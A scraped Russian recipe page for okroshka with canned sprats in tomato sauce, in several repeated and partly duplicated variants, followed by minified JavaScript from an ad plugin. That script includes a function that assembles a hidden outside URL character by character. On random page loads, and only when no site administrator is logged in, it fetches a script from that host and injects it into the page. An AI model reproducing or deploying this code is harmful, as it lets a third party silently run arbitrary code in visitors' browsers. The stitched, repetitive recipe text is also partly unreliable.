Окрошка с килькой в томате

Окрошка с килькой в томатном соусе

Ингредиенты

Килька в томате – 240 г (1 банка)

Свежие огурцы – 2 шт.

Картофель крупный – 1 шт.

Сметана – 3-4 ст.л.

Лук зеленый – 20 г

Укроп свежий – 20 г

  • 57 кКал
  • 20 мин.
  • 30 мин.
  • 50 мин.

Фото готового блюда

Пошаговый рецепт с фото

Окрошка с килькой в томатном соусе — блюдо для настоящих гурманов, истинных почитателей рыбных консервов или любителей экспериментов на кулинарном попроще с целью получения новых и необычных вкусов. Блюдо и правда считается необычным, но чтобы точно определить, насколько оно получается вкусным, необходимо его самостоятельно приготовить и попробовать.

Окрошку с килькой в томате можно готовить на основе воды или кваса. В обоих случаях получается вкусно. Кисломолочные продукты точно не подойдут для данного рецепта.

В первую очередь отварите картофель. Клубни тщательно вымойте, не счищая кожицу, поместите их в кастрюлю с водой, варите примерно 20 минут до мягкости. Готовность овоща определите, проколов клубни насквозь ножом. Главное, не переварите плод, иначе он будет распадаться во время нарезки. Картофель полностью остудите, счистите верхний слой, мякоть нарежьте кубиками среднего размера.

Яйца ополосните под проточной водой, поставьте варить. Чтобы яйца получились “вкрутую”, готовьте их 8-10 минут с момента кипения жидкости. Яйца после варки залейте прохладной водой, чтобы они остыли. После полного охлаждения с яиц будет гораздо легче снять скорлупу. Яйца нарежьте аналогично картофелю.

Свежие огурцы ополосните, нарежьте пластинками, затем каждую пластинку нашинкуйте тонкой соломкой. Огурцы при желании измельчите другим способом, например кубиками.

Редис тщательно вымойте, отрежьте корешки по бокам, далее настрогайте плод полосками.

Все нарезанные продукты сгрузите в одну емкость большого диаметра. Затем из банки перекиньте кильку вместе с томатом.

Содержимое емкости залейте охлажденным квасом, перемешайте.

В завершение добавьте необходимое количество сметаны, перемешиванием распределите ее по квасу. Если после перемешивания все же останутся комочки сметаны, не переживайте, во время настаивания и охлаждения они полностью растворятся в жидкой основе. Для пикантности добавьте в окрошку немного горчицы.

Укроп и зеленый лук ополосните. Толстые стебельки укропа отрежьте, а листочки меленько нашинкуйте. Лук нарежьте небольшими колечками. Зелень закиньте в емкость с основным составом. Соль добавляйте постепенно, чтобы не пересолить окрошку, поскольку крупинки соли не сразу растворяются в холодном квасе. Если вы используете резкий и кислый квас, тогда кислить окрошку больше не нужно.

Загрузите окрошку в холодильник на 1 час, чтобы она хорошо охладилась, а сметана и соль максимально растворились.

Как приготовить окрошку с килькой в томате

Существует огромное количество вариаций классических рецептов русской кухни, некоторые из них стандартны, другие же -очень необычны.

Окрошка с килькой в томатном соусе относится как раз к последним: это блюдо настолько специфично, что его оценят разве что истинные ценители рыбных консервов! Если вы относите себя как раз к ним, то рекомендуем как можно скорее ознакомиться с рецептами, представленными чуть ниже.

Рецепт окрошки с килькой имеет две разновидности. Первая из них делается на квасе, вторая же — на воде. Блюдо, которое приготовлено на воде, имеет менее специфичный вкус, поэтому оно рекомендуется для тех, кто не любит вкусовые эксперименты.

Те же, кто обожает необычные сочетания продуктов, будут приятно удивлены, испробовав блюдо под названием «Окрошка с килькой в томатном соусе».

Отзывы тех, кто ее пробовал, характеризуют эту разновидность окрошки, приготовленную на квасе, как очень освежающую и легкую. Давайте разберемся в рецептуре приготовления!

Окрошка с килькой в томатном соусе: рецепт на квасе

Ингредиенты

  • Килька в томатном соусе – 1 банка;
  • Картофель – 3 шт.;
  • Огурцы – 3 шт.;
  • Редис – 4 шт.;
  • Яйца – 3 шт.;
  • Горчица – 1 ст. ложка;
  • Квас – 1 литр;
  • Сметана – 1 ст. ложка;
  • Соль, перец – по вкусу;
  • Зелень – пучок.

Как приготовить окрошку с килькой на квасе

  1. Картофель отвариваем в мундире до готовности. После достаем из воды и остужаем.
  2. Яйца варим вкрутую. После этого также достаем, охлаждаем и чистим.
  3. Огурцы и редис моем, нарезаем кубиком со стороной примерно 1 сантиметр. Высыпаем нарезку в емкость, в которой продолжим приготовление.
  4. Остывший картофель очищаем от кожуры и нарезаем таким же образом. То же самое делаем и с яйцами. Добавляем все это к остальным ингредиентам.
  5. Открываем банку с анчоусами, выливаем ее содержимое вместе с соусом в нашу емкость. Сюда же высыпаем мелко нарубленную зелень. Все тщательно перемешиваем.
  6. Отдельно смешиваем горчицу, сметану и квас. Солим и перчим. Перемешиваем это все до тех пор, пока горчица и сметана полностью не растворятся в квасе.
  7. Заливаем полученной жидкостью нарезанные ингредиенты. Тщательно перемешиваем.
  8. Емкость с блюдом ставим в холодильник на два часа. После этого достаем, еще раз перемешиваем и разливаем по тарелкам.

Окрошка с килькой в томатном соусе, фото которой представлено чуть выше, является блюдом довольно вариативным. Можно с легкостью менять некоторые ингредиенты или же убирать их.

Например, при желании горчицу можно заменить на такое же количество тертого хрена — это несколько изменит вкусовые нотки.

Окрошка: рецепт с килькой в томате на воде

Ингредиенты

  • Килька в томатном соусе — 1 банка + –
  • Яйца куриные — 5 штук + –
  • Картофель — 5 клубней + –
  • Огурцы свежие — 3 штуки + –
  • Редис — 4 штуки + –
  • Лимонный сок — 1 ч. ложка + –
  • Зелень — пучок + –
  • Горчица — 1 ст. ложка + –
  • Сметана — 2 ст. ложки + –
  • Соль + –
  • Черный перец + –

Как сделать окрошку с килькой на воде

  1. Очищенную воду необходимо довести до кипения, дать ей провариться в течение 5 минут, а затем оставить остывать. Лучше всего провести эту процедуру вечером, а утром приступить к готовке, либо же наоборот.
  2. Куриные яйца необходимо отварить вкрутую, очистить и поставить остужать.
  3. Картофель варим в мундире, сливаем воду и также оставляем, пока не остынет.
  4. Огурцы и редис тщательно промываем и режем на кубики, высыпаем в заранее подготовленную емкость.
  5. Картофель очищаем и нарезаем аналогично, затем также высыпаем в нашу тару.
  6. То же самое проделываем с куриными яйцами, которые к этому моменту должны уже стать холодными.
  7. Вскрываем анчоусы и выливаем содержимое банки в емкость.
  8. Отдельно смешиваем соль, перец, горчицу, лимонный сок и воду. Тщательно перемешиваем и выливаем в емкость к остальным ингредиентам.
  9. Сюда же засыпаем мелко нарубленную, предварительно промытую зелень.
  10. Всю эту массу тщательно перемешиваем и пробуем на соль и перец, если чего-то не достает – досыпаем.
  11. Отправляем наше блюдо настаиваться в холодильник: нужно выждать минимум 2 часа, чтобы все вкусы перемешались и слились воедино.
  12. Спустя указанное время окрошка с килькой готова, ее можно разливать по тарелкам!

Окрошка с килькой в томате, приготовленная на воде, представляет собой скорее холодный суп, нежели необычную разновидность классического рецепта.

Это блюдо менее специфично, а поэтому попробовать его могут практически все, вне зависимости от индивидуальных гастрономических предпочтений.

Окрошка с килькой в томатном соусе традиционно подается с чайной ложкой сметаны. Из указанного здесь количества ингредиентов получается примерно 3-4 полноценные порции, которые отличаются достаточно высокой сытностью.

Подписка на портал «Твой Поваренок»

Для получения новых материалов (постов, статей, бесплатных инфопродуктов) укажите свое имя и электронную почту

Окрошка с килькой в томатном соусе: рецепт с фото пошагово

Накормить всю семью вкусным обедом поможет окрошка с килькой в томатном соусе. Готовится блюдо супер быстро и легко. Даже, если подходит время обеда, а у вас нет первого блюда, рецепты окрошки с килькой выручат вас.

Ингредиенты:

  • Банка консервов «Килька в томате» — 1 Штука
  • Майонез — 250 Грамм
  • Яйца — 4 Штуки
  • Огурец — 1 Штука
  • Редиска — 6-8 Штук
  • Картофель — 3 Штуки
  • Морковь — 1-2 Штук
  • Зеленый горошек — 100 Грамм
  • Квас — 1 Литр
  • Лук зеленый (пучок) — 1 Штука
  • Петрушка — — По вкусу
  • Укроп — — По вкусу

Количество порций: 3-4

Важно! Видео может отличаться от текстовой версии рецепта!

Добавление рецепта в книгу

Добавление рецепта в книгу

Вы можете отдать свой голос только за 1 рецепт. Вы уверены, что хотите проголосовать именно за данный рецепт?

Окрошка с килькой в томатном соусе: рецепт на квасе

Ингредиенты

  • Килька в томатном соусе – 1 банка;
  • Картофель – 3 шт.;
  • Огурцы – 3 шт.;
  • Редис – 4 шт.;
  • Яйца – 3 шт.;
  • Горчица – 1 ст. ложка;
  • Квас – 1 литр;
  • Сметана – 1 ст. ложка;
  • Соль, перец – по вкусу;
  • Зелень – пучок.

Как приготовить окрошку с килькой на квасе

  1. Картофель отвариваем в мундире до готовности. После достаем из воды и остужаем.
  2. Яйца варим вкрутую. После этого также достаем, охлаждаем и чистим.
  3. Огурцы и редис моем, нарезаем кубиком со стороной примерно 1 сантиметр. Высыпаем нарезку в емкость, в которой продолжим приготовление.
  4. Остывший картофель очищаем от кожуры и нарезаем таким же образом. То же самое делаем и с яйцами. Добавляем все это к остальным ингредиентам.
  5. Открываем банку с анчоусами, выливаем ее содержимое вместе с соусом в нашу емкость. Сюда же высыпаем мелко нарубленную зелень. Все тщательно перемешиваем.
  6. Отдельно смешиваем горчицу, сметану и квас. Солим и перчим. Перемешиваем это все до тех пор, пока горчица и сметана полностью не растворятся в квасе.
  7. Заливаем полученной жидкостью нарезанные ингредиенты. Тщательно перемешиваем.
  8. Емкость с блюдом ставим в холодильник на два часа. После этого достаем, еще раз перемешиваем и разливаем по тарелкам.

Окрошка с килькой в томатном соусе, фото которой представлено чуть выше, является блюдом довольно вариативным. Можно с легкостью менять некоторые ингредиенты или же убирать их.

Например, при желании горчицу можно заменить на такое же количество тертого хрена — это несколько изменит вкусовые нотки.

Видеорецепт окрошки

Окрошка с килькой на воде

Окрошка на воде станет вкуснее, и не будут пресной, если в нее добавите лимонного сока. Но берите только свежевыжатый сок, процеженный от косточек. По желанию к подобной окрошке добавьте по чайной ложке соевого соуса и бальзамического уксуса вместо цитрусового сока.

Список ингредиентов:

  • 150 гр. кильки в соусе;
  • 0,5 целого лимона;
  • 5-6 редисок;
  • 3-4 огурца;
  • 2-3 яйца;
  • 1-2 картофелины;
  • по вкусу соли;
  • крупный пучок свежей зелени укропа, петрушки.

Очистите картофель. Сполосните. Нарежьте кусками в кастрюлю. Залейте горячей водой. Закипятите. Варите до готовности кусочков. Слейте весь отвар, он в рецепте не требуется. А картофель продавите в густое пюре. Оставьте, чтобы масса остыла.

Отдельно отварите яйца вкрутую. Очистите и мелко изрежьте. Можно здесь применить терку. Подложите к картошке.

Сполосните и мелко нарежьте огурцы и редиску. Вместо красной редиски допустимо взять белую или дайкон, но тогда очистите корнеплоды от грубой кожицы.

Пряную зелень промойте, обсушите, мелко нарубите. Вместе с редиской переложите в кастрюлю к картофелю. Полейте все соком из половины лимона, следите, чтобы не попали косточки.

Добавьте кильки вместе с соусом, чуть подсолите. Хорошенько перемешайте, чтобы ингредиенты соединились. Долейте кипяченой холодной воды. Перемешайте. По вкусу подсолите еще немного. Чтобы окрошка на воде была вкуснее, дайте ей настояться в холодильнике. Спустя, буквально, 10-15 минут разлейте ее по тарелкам. Подайте с кусочками ржаного или пшеничного хлеба.

Окрошка с колбасой и килькой, консервированной в томате

  • килька в томатном соусе – 0,25 кг;
  • вареная колбаса – 150 г;
  • хлебный квас – 1,5 л;
  • картофель – 0,3 кг;
  • свежие огурцы – 0,2 кг;
  • редис – 100 г;
  • свежая зелень – 100 г;
  • соль, горчица или хрен – по вкусу.
  • Сваренный в мундире картофель остудите и нарежьте некрупными кубиками. Положите в кастрюлю.
  • Редис и огурцы, вымыв и обсушив, нарежьте четвертинками кружков и отправьте к картофелю.
  • Вареную колбасу нарежьте кубиками, отправьте к другим ингредиентам.
  • Мелко порезанную зелень разотрите с солью, переложите в кастрюлю.
  • Добавьте горчицу или хрен.
  • Залейте продукты квасом, перемешайте.
  • Выложите в кастрюлю рыбные консервы. Перемешайте холодный суп еще раз.

Позвольте окрошке немного настояться, убрав ее в холодильник, после чего можете подавать ее к столу.

Килька в томатном соусе относится к числу доступных по цене, но питательных продуктов. Ее можно есть в чистом виде или использовать для приготовления других блюд. К их числу относится окрошка. С рыбными консервами она приобретает непривычный вкус, но он нравится многим. Сделать это кушанье можно по нескольким рецептам, каждый из которых позволяет получить холодный суп, обладающий уникальными органолептическими качествами.

Окрошка с килькой в томатном соусе – 3 лучших рецепта

Накормить всю семью вкусным обедом поможет окрошка с килькой в томатном соусе. Готовится блюдо супер быстро и легко. Даже, если подходит время обеда, а у вас нет первого блюда, рецепты окрошки с килькой выручат вас.

Ингредиенты для окрошки

Перед тем, как начать готовить окрошку, ознакомьтесь с интересными и полезными секретами:

  • если кушанье готовится с водой, обязательно добавьте немного кислоты, ею станет свежевыжатый лимонный сок (2-3 столовые ложки на 3 литра окрошки), яблочный уксус (1 столовая ложка) или лимонная кислота (пару щепоток);
  • в рецептах окрошки с квасом важно использовать качественный напиток, сделанный путем натурального брожения или хлебный квас собственного производства;
  • если планируете приготовить кушанье на несколько дней, обязательно храните его в холодильнике.

Окрошка с килькой в томатном соусе на квасе

В окрошку на квасе зачастую добавляют немного хрена. Если свежего под рукой нет, берите консервированный или используйте столовую горчицу с хреном. Кушанье станет пикантнее и немного острее.

Список ингредиентов:

  • 1 банка кильки в томате;
  • 1,5 литра хлебного кваса;
  • 2-3 огурца (примерно 200 гр.);
  • 3-4 картофелины;
  • 2 яйца куриных;
  • 0,5 десертной ложки хрена;
  • для подачи сметана;
  • 3-4 пучка зеленого лука;
  • по вкусу мелкой соли.

Перед непосредственным приготовлением придется позаботиться о картошке и яйцах. Отварите эти продукты до готовности. Затем очистите клубни от кожицы, а яйца от скорлупы. Остудите и нарежьте продукты мелкими кубиками. Все переложите в кастрюлю, где планируете собирать окрошку.

Добавьте нарезанных свежих огурцов, рубленого зеленого лука, немного хрена. Все перемешайте. При желании перья зеленого лука замените любой другой свежей зеленью. К примеру, это могут быть молодые перья чеснока, петрушка, кинза или укроп.

Кильку вытащите из банки вместе с томатным соусом. Можно оставить в таком виде или чуть продавить вилкой для измельчения. Переложите в кастрюлю к остальным продуктам.

Долейте холодного кваса. Тщательно все перемешайте. Подсолите мелкой солью. Попробуйте на вкус. Окрошка на квасе уже готова к употреблению. Осталось только добавить немного сметаны, но ее лучше положите уже в тарелки на каждую порцию.

Окрошка с килькой на воде

Окрошка на воде станет вкуснее, и не будут пресной, если в нее добавите лимонного сока. Но берите только свежевыжатый сок, процеженный от косточек. По желанию к подобной окрошке добавьте по чайной ложке соевого соуса и бальзамического уксуса вместо цитрусового сока.

Список ингредиентов:

  • 150 гр. кильки в соусе;
  • 0,5 целого лимона;
  • 5-6 редисок;
  • 3-4 огурца;
  • 2-3 яйца;
  • 1-2 картофелины;
  • по вкусу соли;
  • крупный пучок свежей зелени укропа, петрушки.

Очистите картофель. Сполосните. Нарежьте кусками в кастрюлю. Залейте горячей водой. Закипятите. Варите до готовности кусочков. Слейте весь отвар, он в рецепте не требуется. А картофель продавите в густое пюре. Оставьте, чтобы масса остыла.

Отдельно отварите яйца вкрутую. Очистите и мелко изрежьте. Можно здесь применить терку. Подложите к картошке.

Сполосните и мелко нарежьте огурцы и редиску. Вместо красной редиски допустимо взять белую или дайкон, но тогда очистите корнеплоды от грубой кожицы.

Пряную зелень промойте, обсушите, мелко нарубите. Вместе с редиской переложите в кастрюлю к картофелю. Полейте все соком из половины лимона, следите, чтобы не попали косточки.

Добавьте кильки вместе с соусом, чуть подсолите. Хорошенько перемешайте, чтобы ингредиенты соединились. Долейте кипяченой холодной воды. Перемешайте. По вкусу подсолите еще немного. Чтобы окрошка на воде была вкуснее, дайте ей настояться в холодильнике. Спустя, буквально, 10-15 минут разлейте ее по тарелкам. Подайте с кусочками ржаного или пшеничного хлеба.

Рецепт окрошки с килькой и колбасой

С колбасой окрошка станет интереснее по вкусу и сытнее. Лучший вариант – взять вареную колбасу, но подойдет и сыровяленая или даже копченая.

Список ингредиентов:

  • 150 гр. вареной колбасы;
  • 1 банка кильки;
  • 100 гр. дайкона;
  • 0,5 десертной ложки столовой горчицы;
  • 1,5 литра хлебного кваса;
  • 2-3 картофелины;
  • пучок зелени (перья чеснока, лука, укроп);
  • по вкусу соли.

Заранее отварите картошку. Очистите и нарежьте кубиками в кастрюлю. Пока она остывает, очистите дайкон. Перетрите корнеплод через терку в эту же кастрюлю.

Мелко порубите свежую пряную зелень. Чтобы кушанье было вкуснее, используйте разную зелень. Переложите в картошке.

С колбасой можно поколдовать, ее по желанию натрите через терку или мелко нарежьте. Добавьте к остальным продуктам.

Совет! Вместо колбасы можно использовать отварное или копченое мясо, мякоть птицы. Мелко нарежьте свинину, говядину или курицу и отправьте в окрошку.

Заправьте массу горчицей, долейте прохладного кваса. Выложите из банки кильку. Перемешайте. Подсолите. Подайте блюдо к столу в холодном виде. Приятного аппетита!

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};